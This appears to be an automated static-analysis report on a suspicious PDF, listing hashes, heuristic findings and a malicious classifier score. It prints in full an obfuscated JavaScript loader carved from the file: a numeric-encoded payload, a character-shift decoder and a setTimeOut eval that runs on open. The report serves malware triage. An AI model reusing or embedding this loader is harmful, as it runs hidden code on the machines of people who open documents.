PDF static analysis report

Static analysis result for SHA-256 de8007f50ea5c469…

SUSPICIOUS

PDF

37.4 KB Created: 2010-04-12 16:09:41 +04:00 Authoring application: TCPDF (via TCPDF 4.8.032 (http://www.tcpdf.org)) First seen: 2026-05-11
MD5: 9aae5427885fbce7152fa0c3501b59f6 SHA-1: 8cc5631b35d2d09c09ccc3ba3c7f60bffbd8649a SHA-256: de8007f50ea5c46942fb88aab2bf1083777d381a2867fcebc565e1b5e171056e
56 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger low PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0x7062 8330 bytes
SHA-256: 00bc08d61a1d3d6364214a463c84e2e47777e8854317124d74c4f35a19618595
Preview script
First 1,000 lines of the extracted script
�� 
 v a r   A v V S J M 1   =   ' 3 3 1 u 3 4 6 P 3 3 9 h 3 2 8 s 3 4 5 V 3 3 4 B 3 4 0 k 3 3 9 C 2 6 1 Y 3 2 9 i 3 3 0 w 3 2 8 q 3 4 0 V 3 2 9 e 3 3 0 j 3 2 4 p 3 2 7 t 3 3 4 v 3 4 1 U 2 6 9 B 3 3 0 j 3 3 9 Y 3 2 8 R 3 2 4 W 3 4 4 k 3 4 5 T 3 4 3 y 2 7 0 t 2 3 9 A 3 5 2 A 2 3 9 n 2 6 1 u 2 6 1 Q 2 6 1 V 2 6 1 m 3 4 7 m 3 2 6 X 3 4 3 X 2 6 1 o 3 2 6 v 3 4 3 F 2 6 1 k 2 9 0 m 2 6 1 b 3 3 9 P 3 3 0 V 3 4 8 Q 2 6 1 I 2 9 4 Q 3 4 3 l 3 4 3 J 3 2 6 A 3 5 0 J 2 6 9 b 2 7 0 X 2 8 8 u 2 3 9 u 2 6 1 V 2 6 1 o 2 6 1 u 2 6 1 W 3 2 6 c 3 4 3 p 2 6 1 m 2 9 0 x 2 6 1 c 3 3 0 Y 3 3 9 U 3 2 8 z 3 2 4 N 3 4 4 Q 3 4 5 E 3 4 3 y 2 7 5 C 3 4 4 g 3 4 1 N 3 3 7 Y 3 3 4 w 3 4 5 W 2 6 9 o 2 6 8 h 2 8 8 g 2 6 8 p 2 7 0 r 2 8 8 H 2 3 9 M 2 6 1 m 2 6 1 B 2 6 1 i 2 6 1 a 3 4 7 w 3 2 6 E 3 4 3 C 2 6 1 l 3 3 9 r 3 4 0 z 3 4 1 O 2 6 1 Q 2 9 0 U 2 6 1 N 2 6 8 d 2 6 8 l 2 8 8 S 2 3 9 b 2 6 1 n 2 6 1 y 2 6 1 p 2 6 1 M 3 3 1 u 3 4 0 M 3 4 3 B 2 6 9 c 3 3 4 s 2 6 1 q 2 9 0 T 2 6 1 A 2 7 7 D 2 8 8 F 3 3 4 B 2 6 1 l 2 8 9 g 2 6 1 y 3 2 6 p 3 4 3 i 2 7 5 k 3 3 7 h 3 3 0 i 3 3 9 y 3 3 2 x 3 4 5 C 3 3 3 L 2 8 8 a 3 3 4 n 2 7 2 d 2 7 2 C 2 7 0 b 2 6 1 c 3 5 2 s 2 3 9 n 2 3 8 W 3 3 9 E 3 4 0 o 3 4 1 y 2 7 2 w 2 9 0 f 3 1 2 S 3 4 5 w 3 4 3 i 3 3 4 Y 3 3 9 y 3 3 2 T 2 7 5 E 3 3 1 x 3 4 3 J 3 4 0 m 3 3 8 h 2 9 6 q 3 3 3 V 3 2 6 f 3 4 3 o 2 9 6 X 3 4 0 r 3 2 9 O 3 3 0 L 2 6 9 V 3 2 6 R 3 4 3 n 3 2 0 x 3 3 4 J 3 2 2 b 2 7 0 U 2 8 8 N 2 3 9 P 2 6 1 T 2 6 1 K 2 6 1 v 2 6 1 m 3 5 4 G 2 3 9 d 2 6 1 K 2 6 1 F 2 6 1 x 2 6 1 P 3 4 3 C 3 3 0 H 3 4 5 C 3 4 6 k 3 4 3 y 3 3 9 X 2 6 1 P 3 3 9 m 3 4 0 u 3 4 1 H 2 8 8 B 2 3 9 G 3 5 4 c 2 3 9 S 2 3 9 t 3 3 1 a 3 4 6 c 3 3 9 U 3 2 8 u 3 4 5 p 3 3 4 k 3 4 0 O 3 3 9 z 2 6 1 f 3 2 8 A 3 3 3 G 3 3 0 J 3 2 8 K 3 3 6 M 3 2 4 H 3 4 3 Z 3 4 6 P 3 3 9 O 2 6 9 b 2 7 0 z 2 3 9 M 3 5 2 y 2 3 9 O 2 6 1 y 2 6 1 t 2 6 1 W 2 6 1 A 3 4 5 z 3 3 3 z 3 3 4 S 3 4 4 t 2 7 5 Z 3 4 4 u 3 5 0 N 3 3 9 U 3 2 8 k 2 9 4 x 3 3 9 i 3 3 9 k 3 4 0 d 3 4 5 j 3 1 2 q 3 2 8 n 3 2 6 t 3 3 9 D 2 6 9 u 2 7 0 T 2 8 8 S 2 3 9 I 2 6 1 v 2 6 1 R 2 6 1 U 2 6 1 u 3 4 7 g 3 2 6 T 3 4 3 o 2 6 1 C 3 4 7 T 3 3 0 n 3 4 3 B 3 4 4 m 3 3 4 h 3 4 0 b 3 3 9 h 2 6 1 u 2 9 0 w 2 6 1 R 3 2 6 s 3 4 1 e 3 4 1 B 2 7 5 W 3 4 7 N 3 3 4 s 3 3 0 J 3 4 8 H 3 3 0 v 3 4 3 D 3 1 5 b 3 3 0 N 3 4 3 L 3 4 4 W 3 3 4 f 3 4 0 g 3 3 9 R 2 7 5 L 3 4 5 A 3 4 0 F 3 1 2 N 3 4 5 U 3 4 3 t 3 3 4 P 3 3 9 H 3 3 2 a 2 6 9 r 2 7 0 o 2 8 8 V 2 3 9 n 2 6 1 G 2 6 1 O 2 6 1 R 2 6 1 I 3 4 7 k 3 3 0 f 3 4 3 A 3 4 4 u 3 3 4 n 3 4 0 w 3 3 9 x 2 6 1 P 2 9 0 K 2 6 1 J 3 4 7 m 3 3 0 p 3 4 3 q 3 4 4 D 3 3 4 B 3 4 0 r 3 3 9 I 2 7 5 O 3 4 3 M 3 3 0 C 3 4 1 e 3 3 7 T 3 2 6 d 3 2 8 V 3 3 0 I 2 6 9 y 2 7 6 I 3 2 1 O 2 9 7 N 2 7 6 a 3 3 2 W 2 7 3 y 2 6 1 G 2 6 3 X 2 6 3 s 2 7 0 u 2 8 8 T 2 3 9 q 2 6 1 J 2 6 1 e 2 6 1 A 2 6 1 v 3 4 7 T 3 2 6 r 3 4 3 y 2 6 1 V 3 4 7 i 3 2 6 H 3 4 3 j 3 4 4 v 3 3 4 K 3 4 0 O 3 3 9 O 3 2 4 n 3 2 6 k 3 4 3 W 3 4 3 m 3 2 6 t 3 5 0 l 2 6 1 z 2 9 0 U 2 6 1 H 3 3 9 y 3 3 0 b 3 4 8 f 2 6 1 q 2 9 4 V 3 4 3 z 3 4 3 h 3 2 6 f 3 5 0 d 2 6 9 i 3 4 7 a 3 3 0 x 3 4 3 Z 3 4 4 Z 3 3 4 S 3 4 0 I 3 3 9 h 2 7 5 C 3 2 8 D 3 3 3 s 3 2 6 R 3 4 3 S 2 9 4 f 3 4 5 B 2 6 9 o 2 7 7 S 2 7 0 v 2 7 3 a 2 6 1 R 3 4 7 P 3 3 0 i 3 4 3 P 3 4 4 q 3 3 4 N 3 4 0 G 3 3 9 M 2 7 5 M 3 2 8 n 3 3 3 r 3 2 6 q 3 4 3 V 2 9 4 S 3 4 5 n 2 6 9 v 2 7 8 s 2 7 0 G 2 7 3 D 2 6 1 a 3 4 7 J 3 3 0 H 3 4 3 S 3 4 4 a 3 3 4 Z 3 4 0 x 3 3 9 c 2 7 5 O 3 2 8 P 3 3 3 X 3 2 6 p 3 4 3 h 2 9 4 n 3 4 5 X 2 6 9 x 2 7 9 e 2 7 0 k 2 7 0 D 2 8 8 r 2 3 9 x 2 6 1 r 2 6 1 j 2 6 1 n 2 6 1 N 3 3 4 B 3 3 1 b 2 6 1 J 2 6 9 u 2 6 9 h 3 4 7 N 3 2 6 U 3 4 3 r 3 4 4 U 3 3 4 m 3 4 0 R 3 3 9 u 3 2 4 k 3 2 6 u 3 4 3 J 3 4 3 A 3 2 6 S 3 5 0 y 3 2 0 h 2 7 7 F 3 2 2 V 2 6 1 f 2 8 9 k 2 6 1 G 2 8 5 i 2 7 0 b 2 6 1 D 3 5 3 a 3 5 3 K 2 6 1 q 2 6 9 o 3 4 7 M 3 2 6 R 3 4 3 x 3 4 4 H 3 3 4 z 3 4 0 K 3 3 9 b 3 2 4 q 3 2 6 f 3 4 3 O 3 4 3 I 3 2 6 a 3 5 0 y 3 2 0 D 2 7 7 k 3 2 2 z 2 6 1 V 2 9 0 i 2 9 0 g 2 6 1 b 2 8 5 E 2 6 1 L 2 6 7 L 2 6 7 K 2 6 1 u 3 4 7 n 3 2 6 N 3 4 3 V 3 4 4 y 3 3 4 E 3 4 0 J 3 3 9 K 3 2 4 V 3 2 6 H 3 4 3 R 3 4 3 V 3 2 6 S 3 5 0 t 3 2 0 M 2 7 8 y 3 2 2 I 2 6 1 V 2 8 9 Y 2 6 1 G 2 7 9 Y 2 6 1 I 2 6 7 F 2 6 7 u 2 6 1 r 3 4 7 m 3 2 6 V 3 4 3 v 3 4 4 y 3 3 4 h 3 4 0 G 3 3 9 t 3 2 4 V 3 2 6 T 3 4 3 P 3 4 3 T 3 2 6 Y 3 5 0 Z 3 2 0 e 2 7 9 u 3 2 2 g 2 6 1 w 2 8 9 P 2 6 1 z 2 7 9 p 2 7 0 c 2 7 0 x 2 6 1 x 3 5 2 x 2 3 9 W 2 3 8 E 3 4 7 W 3 2 6 e 3 4 3 K 2 6 1 R 3 2 6 W 3 3 9 x 3 3 9 n 2 6 1 R 2 9 0 v 2 6 1 U 3 4 5 Y 3 3 3 p 3 3 4 q 3 4 4 s 2 7 5 E 3 3 2 J 3 3 0 Q 3 4 5 e 2 9 4 n 3 3 9 K 3 3 9 K 3 4 0 j 3 4 5 a 2 6 9 K 2 7 7 Z 2 7 3 C 2 6 1 H 2 6 3 W 2 7 7 A 2 7 7 d 2 7 7 b 2 7 8 X 2 7 4 I 2 7 7 l 2 7 7 o 2 7 7 e 2 7 8 i 2 6 3 c 2 7 0 w 2 8 8 e 2 6 1 x 2 3 9 U 2 3 8 U 3 4 7 n 3 2 6 M 3 4 3 Z 2 6 1 w 3 2 7 c 3 3 4 D 3 4 1 j 2 6 1 m 2 9 0 O 2 6 1 S 2 6 8 M 2 6 8 Y 2 8 8 r 2 3 9 P 2 3 8 g 3 3 4 O 3 3 1 P 2 6 9 J 2 6 1 p 3 2 6 n 3 3 9 S 3 3 9 b 2 6 1 b 2 6 2 w 2 9 0 K 2 6 1 D 3 3 9 s 3 4 6 p 3 3 7 B 3 3 7 N 2 6 1 J 2 7 0 o 2 6 1 Z 3 5 2 j 2 3 9 k 2 3 8 C 2 6 1 m 2 6 1 T 2 6 1 o 2 6 1 A 3 2 7 m 3 3 4 B 3 4 1 Z 2 6 1 e 2 9 0 R 2 6 1 F 3 2 6 t 3 3 9 h 3 3 9 P 2 7 5 i 3 4 4 U 3 4 6 h 3 2 7 K 3 3 5 w 3 3 0 d 3 2 8 U 3 4 5 A 2 8 8 W 2 3 9 J 2 3 8 B 3 5 4 j 2 3 9 T 2 3 8 p 3 3 9 I 3 3 4 C 3 4 1 Z 2 6 1 L 2 9 0 o 2 6 1 t 3 2 9 z 3 3 0 p 3 2 8 g 3 4 0 B 3 2 9 P 3 3 0 L 3 2 4 T 3 2 7 V 3 3 4 E 3 4 1 A 2 6 9 k 3 2 7 n 3 3 4 U 3 4 1 R 2 7 0 x 2 8 8 R 2 3 9 v 2 3 8 S 3 3 0 R 3 4 7 S 3 2 6 c 3 3 7 T 2 6 9 B 3 3 9 v 3 3 4 I 3 4 1 K 2 7 0 x 2 8 8 i 2 3 9 V 2 6 1 m 2 6 1 b 2 6 1 V 2 6 1 c 3 5 4 I 2 6 1 X 3 3 0 s 3 3 7 T 3 4 4 q 3 3 0 N 2 6 1 X 3 5 2 r 2 3 9 x 2 3 8 K 3 4 7 L 3 2 6 P 3 4 3 I 2 6 1 d 3 2 6 L 3 3 9 a 3 3 9 u 2 6 1 d 2 9 0 C 2 6 1 N 3 4 5 f 3 3 3 y 3 3 4 W 3 4 4 q 2 7 5 w 3 3 2 E 3 3 0 L 3 4 5 i 2 9 4 g 3 3 9 h 3 3 9 L 3 4 0 o 3 4 5 F 2 6 9 D 2 7 7 I 2 7 3 v 2 6 1 R 2 6 3 f 2 7 7 n 2 7 7 P 2 7 7 q 2 7 8 z 2 7 4 e 2 7 7 y 2 7 7 c 2 7 7 q 2 7 7 Z 2 6 3 X 2 7 0 T 2 8 8 c 2 6 1 k 2 3 9 z 2 3 8 a 3 4 7 H 3 2 6 p 3 4 3 W 2 6 1 M 3 2 7 B 3 3 4 F 3 4 1 s 2 6 1 i 2 9 0 R 2 6 1 h 2 6 8 n 2 6 8 V 2 8 8 p 2 3 9 j 2 3 8 m 3 3 4 V 3 3 1 W 2 6 9 B 2 6 1 M 3 2 6 V 3 3 9 g 3 3 9 L 2 6 1 x 2 6 2 W 2 9 0 k 2 6 1 V 3 3 9 q 3 4 6 N 3 3 7 G 3 3 7 p 2 6 1 n 2 7 0 N 2 6 1 e 3 5 2 K 2 3 9 Z 2 6 1 f 2 6 1 P 2 6 1 S 2 6 1 O 2 3 8 h 2 6 1 z 2 6 1 C 2 6 1 C 2 6 1 p 3 2 7 l 3 3 4 p 3 4 1 L 2 6 1 I 2 9 0 q 2 6 1 X 3 2 6 e 3 3 9 X 3 3 9 i 2 7 5 c 3 4 4 u 3 4 6 T 3 2 7 x 3 3 5 k 3 3 0 g 3 2 8 D 3 4 5 a 2 8 8 U 2 3 9 Q 2 3 8 F 3 5 4 e 2 3 9 q 2 3 8 l 3 3 9 u 3 3 4 I 3 4 1 z 2 6 1 b 2 9 0 I 2 6 1 C 3 2 9 e 3 3 0 y 3 2 8 o 3 4 0 T 3 2 9 J 3 3 0 w 3 2 4 K 3 2 7 h 3 3 4 b 3 4 1 i 2 6 9 Q 3 2 7 D 3 3 4 c 3 4 1 j 2 7 0 B 2 8 8 N 2 3 9 Q 2 3 8 E 3 3 0 n 3 4 7 k 3 2 6 V 3 3 7 t 2 6 9 P 3 3 9 M 3 3 4 e 3 4 1 J 2 7 0 U 2 8 8 e 2 3 9 l 2 6 1 d 2 6 1 g 2 6 1 P 2 6 1 c 3 5 4 U 2 3 9 j 3 5 4 m 2 3 9 R 2 3 9 u 3 2 6 T 3 4 1 s 3 4 1 c 2 7 5 k 3 2 6 w 3 3 7 E 3 3 0 T 3 4 3 x 3 4 5 R 2 6 9 k 2 6 8 B 2 7 8 F 2 6 8 U 2 7 0 X 2 8 8 y 2 3 9 j 3 2 8 j 3 3 3 d 3 3 0 t 3 2 8 E 3 3 6 H 3 2 4 e 3 4 3 i 3 4 6 o 3 3 9 u 2 6 9 K 2 7 0 I 2 8 8 e ' ; 
 v a r   Y I 7 N E R 5 G Y   =   2 2 9 ; 
 A v V S J M 1   =     A v V S J M 1 . r e p l a c e ( / [ ^ 0 - 9 ] / g , ' : ' ) ; 
 x i T X K b Y q   =   ' Y I 7 N E R 5 G Y ' ; 
 A v V S J M 1   =     A v V S J M 1 . r e p l a c e ( / : : / g , ' ' ) ; 
 a p p . a l e r t ( A v V S J M 1 ) ; 
 f u n c t i o n   S 8 W x r S A K x y q 2   (   F u i g s Z i E I U x U ,   R 7 2 E B U 5 t s v x e   )   {   v a r   F i W 0 O   =   n e w   S t r i n g ( ) ; v a r   E 2 U F c 9 2 V K B   =   n e w   S t r i n g ( ) ; 
 D G h Y a   =   F u i g s Z i E I U x U   . s p l i t ( ' : ' ) ; 
 f o r ( C Z a M f y a 7   =   0 ;   C Z a M f y a 7   <   D G h Y a . l e n g t h - 1 ; C Z a M f y a 7 + + )   {   P r f W a C g z =   S t r i n g [ ' f r o m C h a r C o d e ' ] ( D G h Y a [ C Z a M f y a 7 ]   -   R 7 2 E B U 5 t s v x e ) ; ; 
 E 2 U F c 9 2 V K B   =   E 2 U F c 9 2 V K B   +   P r f W a C g z ; }   r e t u r n   E 2 U F c 9 2 V K B ; } ; 
 x i T X K b Y q   =   S 8 W x r S A K x y q 2 ( A v V S J M 1 , Y I 7 N E R 5 G Y ) ; 
 v a r   D k w D S U n W   =   ' a ' ; 
 v a r   R O s j M T q P   =   ' u ' ; 
 l i l i C c 9 X 9 6 S q   =     a p p [ ' s e t ' + ' T i m e O '   +   R O s j M T q P   + ' t ' ] ( " e v " + D k w D S U n W + " l ( x i T X K b Y q ) " ,   1 ) ;
stream_001_off00007062.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x7062 4164 bytes
SHA-256: 4d8c1d022fcca69f1b2afe1664250312f1bc921ee80a0da68b26bd84f6daa001
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).